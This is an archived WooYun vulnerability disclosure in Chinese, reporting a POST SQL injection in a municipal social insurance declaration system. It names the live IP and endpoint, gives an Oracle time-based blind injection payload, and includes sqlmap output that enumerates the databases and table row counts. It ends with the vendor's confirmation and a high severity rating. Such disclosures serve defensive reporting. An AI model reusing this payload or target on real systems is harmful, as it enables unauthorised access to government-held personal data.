乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2015-05-18: 细节已通知厂商并且等待厂商处理中 2015-05-19: 厂商已经确认,细节仅向厂商公开 2015-05-29: 细节向核心白帽子及相关领域专家公开 2015-06-08: 细节向普通白帽子公开 2015-06-18: 细节向实习白帽子公开 2015-07-03: 细节向公众公开
某市社会保险申报系统存在POST注射
http://113.106.218.163:8001/grcx/action/LoginAction (POST)UserType=4&DWSXH=88952634&GMSFHM=88952634&ZSXM=88952634&Password=88952634&imagecheck=88952634&SZDW=88952634&UserID=88952634
sqlmap identified the following injection points with a total of 1765 HTTP(s) requests:---Parameter: UserID (POST) Type: AND/OR time-based blind Title: Oracle AND time-based blind Payload: UserType=4&DWSXH=88952634&GMSFHM=88952634&ZSXM=88952634&Password=88952634&imagecheck=88952634&SZDW=88952634&UserID=88952634' AND 1805=DBMS_PIPE.RECEIVE_MESSAGE(CHR(83)||CHR(80)||CHR(110)||CHR(107),5) AND 'dgZI'='dgZI---web application technology: JSPback-end DBMS: Oraclesqlmap identified the following injection points with a total of 0 HTTP(s) requests:---Parameter: UserID (POST) Type: AND/OR time-based blind Title: Oracle AND time-based blind Payload: UserType=4&DWSXH=88952634&GMSFHM=88952634&ZSXM=88952634&Password=88952634&imagecheck=88952634&SZDW=88952634&UserID=88952634' AND 1805=DBMS_PIPE.RECEIVE_MESSAGE(CHR(83)||CHR(80)||CHR(110)||CHR(107),5) AND 'dgZI'='dgZI---web application technology: JSPback-end DBMS: Oracleavailable databases [26]:[*] "CTXSYS\X03"[*] "H`WSSB"[*] "HR\X11"[*] "OE\T"[*] "QS_WS\X03"[*] "XDY\X02"[*] HZWSSB_CS[*] MDSYS[*] ODM[*] OEM_MTR[*] OLAPSYS[*] ORDSYS[*] OUTLN[*] PM[*] QS[*] QS_aS[*] QS_CBADM[*] QS_CS[*] QS_ES[*] RMAN[*] SCOTT[*] SH[*] SYS[*] SYSTEM[*] WKSYS[*] WMSYS
[*] "CTXSYS"[*] "H`WSSB"[*] "HR"[*] "OE "[*] "QS_WS"[*] "XDY"[*] HZWSSB_CS[*] MDSYS[*] ODM[*] OEM_MTR[*] OLAPSYS[*] ORDSYS[*] OUTLN[*] PM[*] QS[*] QS_aS[*] QS_CBADM[*] QS_CS[*] QS_ES[*] RMAN[*] SCOTT[*] SH[*] SYS[*] SYSTEM[*] WKSYS[*] WMSYSDatabase: WKSYS+-----------------------------+---------+| Table | Entries |+-----------------------------+---------+| WK$CHARSET | 57 || WK$MIMETYPES | 35 || WK$LANG | 14 || WK$SYS_CONFIG | 1 |+-----------------------------+---------+Database: HZWSSB_CS+-----------------------------+---------+| Table | Entries |+-----------------------------+---------+| S_U_USER_TO_ROLE | 205073 || RECV_DETAIL | 21877 || RECVSTAT | 6740 || SJCJ_YWJL_0424 | 3480 || SJCJ_ZHCS | 2755 || SJCJ_SCJL | 2630 || SJCJ_YWJL_SH | 1925 || SENDSTAT | 1200 || CSINTERFACELOG | 751 || SJCJ_YWJL | 177 || SJCJ_SPGZ | 144 || SJCJ_TJJL_SH | 122 || SYSTAB_DICTIONARY_DATA | 73 || S_U_ROLE_TO_RIGHT | 69 || SJCJ_GRZL | 62 || SYS_CXLBCS | 59 || S_U_RIGHT | 57 || SYS_GENTBL_CONF | 57 || SYS_GENTBL_QUERYSQL | 33 || S_R_NOTES | 29 || SYS_COMMIT_SQL | 21 || SYS_SEQUENCE | 19 || T_PH | 18 || S_WZM | 16 || S_XZSZ | 12 || SJCJ_TJJL | 12 || SJCJ_MMCSHMX | 11 || SJCJ_SCWJ | 11 || SJCJ_WSMMBH | 6 || S_U_ROLE | 5 || SYS_BULLETIN | 3 || S_DUAL | 1 || S_U_ORG | 1 || SYSTAB_DYNDICT | 1 |+-----------------------------+---------+Database: QS+-----------------------------+---------+| Table | Entries |+-----------------------------+---------+| AQ$_AQ$_MEM_MC_S | 1 || AQ$_QS_ORDERS_PR_MQTAB_S | 1 |+-----------------------------+---------+Database: ORDSYS+-----------------------------+---------+| Table | Entries |+-----------------------------+---------+| ORD_CARTRIDGE_COMPONENTS | 86 || JACCELERATOR$DLLS | 14 |+-----------------------------+---------+Database: QS_ES+-----------------------------+---------+| Table | Entries |+-----------------------------+---------+| AQ$_QS_ES_ORDERS_MQTAB_S | 1 || AQ$_QS_ES_ORDERS_PR_MQTAB_S | 1 |+-----------------------------+---------+Database: OLAPSYS+-----------------------------+---------+| Table | Entries |+-----------------------------+---------+| CWM$ITEMUSE | 118 || CWM$LEVELATTRIBUTE | 67 || CWM$CLASSIFICATIONENTRY | 66 || CWM$ITEMMAP | 59 || CWM$LEVEL | 27 || CWM$CLASSIFICATION | 24 || CWM$DIMENSIONATTRIBUTE | 23 || CWM$DOMAIN | 21 || CWM$FUNCTION | 13 || CWM$CLASSIFICATIONTYPE | 10 || CWM$OBJECTTYPE | 10 || CWM$CUBEDIMENSIONUSE | 7 || CWM$FACTLEVELUSE | 7 || CWM$DIMENSION | 5 || CWM$PARAMETER | 5 || CWM$FACTUSE | 4 || CWM$FUNCTIONUSE | 4 || CWM$MEASURE | 4 || CWM$MEASUREDIMENSIONUSE | 4 || CWM$MODEL | 3 || CWM$PROJECT | 3 || CWM$CUBE | 2 || CWM$FACTTABLEMAP | 2 |+-----------------------------+---------+Database: QS_CS+-----------------------------+---------+| Table | Entries |+-----------------------------+---------+| AQ$_QS_CS_ORDER_STATUS_QT_S | 1 |+-----------------------------+---------+Database: SYSTEM+-----------------------------+---------+| Table | Entries |+-----------------------------+---------+| HELP | 918 || AQ$_QUEUES | 40 || REPCAT$_OBJECT_TYPES | 28 || REPCAT$_RESOLUTION_METHOD | 19 || "LOGMNR_SESSIO\?81$" | 4 || REPCAT$_TEMPLATE_STATUS | 3 || REPCAT$_AUDIT_ATTRIBUTE | 2 || REPCAT$_TEMPLATE_TYPES | 2 |+-----------------------------+---------+Database: SH+-----------------------------+---------+| Table | Entries |+-----------------------------+---------+| SALES | 1016271 || COSTS | 787766 || FWEEK_PSCAT_SALES_MV | 149325 || CUSTOMERS | 50000 || PRODUCTS | 10000 || TIMES | 1461 || PROMOTIONS | 501 || CAL_MONTH_SALES_MV | 35 || COUNTRIES | 19 || CHANNELS | 5 |+-----------------------------+---------+Database: SCOTT+-----------------------------+---------+| Table | Entries |+-----------------------------+---------+| EMP | 14 || SALGRADE | 5 || DEPT | 4 |+-----------------------------+---------+Database: ODM+-----------------------------+---------+| Table | Entries |+-----------------------------+---------+| ODM_ERROR_TABLE | 342 || ODM_CONFIGURATION | 25 || ODM_INTERNAL_CONFIGURATION | 19 || ODM_PMML_DTD | 1 |+-----------------------------+---------+Database: QS_CBADM+-----------------------------+---------+| Table | Entries |+-----------------------------+---------+| AQ$_QS_CBADM_ORDERS_MQTAB_S | 3 |+-----------------------------+---------+Database: RMAN+-----------------------------+---------+| Table | Entries |+-----------------------------+---------+| CONFIG | 1 || RCVER | 1 |+-----------------------------+---------+Database: MDSYS+-----------------------------+---------+| Table | Entries |+-----------------------------+---------+| CS_SRS | 1000 || SDO_DATUMS | 118 || MD$RELATE | 90 || SDO_DIST_UNITS | 54 || SDO_AREA_UNITS | 48 || SDO_ELLIPSOIDS | 47 || SDO_PROJECTIONS | 42 || SDO_ANGLE_UNITS | 12 |+-----------------------------+---------+Database: WMSYS+-----------------------------+---------+| Table | Entries |+-----------------------------+---------+| WM$WORKSPACE_PRIV_TABLE | 8 || WM$ENV_VARS | 1 || WM$VERSION_HIERARCHY_TABLE | 1 || WM$WORKSPACES_TABLE | 1 |+-----------------------------+---------+Database: PM+-----------------------------+---------+| Table | Entries |+-----------------------------+---------+| ONLINE_MEDIA | 9 || PRINT_MEDIA | 4 |+-----------------------------+---------+
危害等级:高
漏洞Rank:10
确认时间:2015-05-19 16:22
非常感谢您的报告。报告中的问题已确认并复现.影响的数据:高攻击成本:低造成影响:高综合评级为:高,rank:10正在联系相关网站管理单位处置。
暂无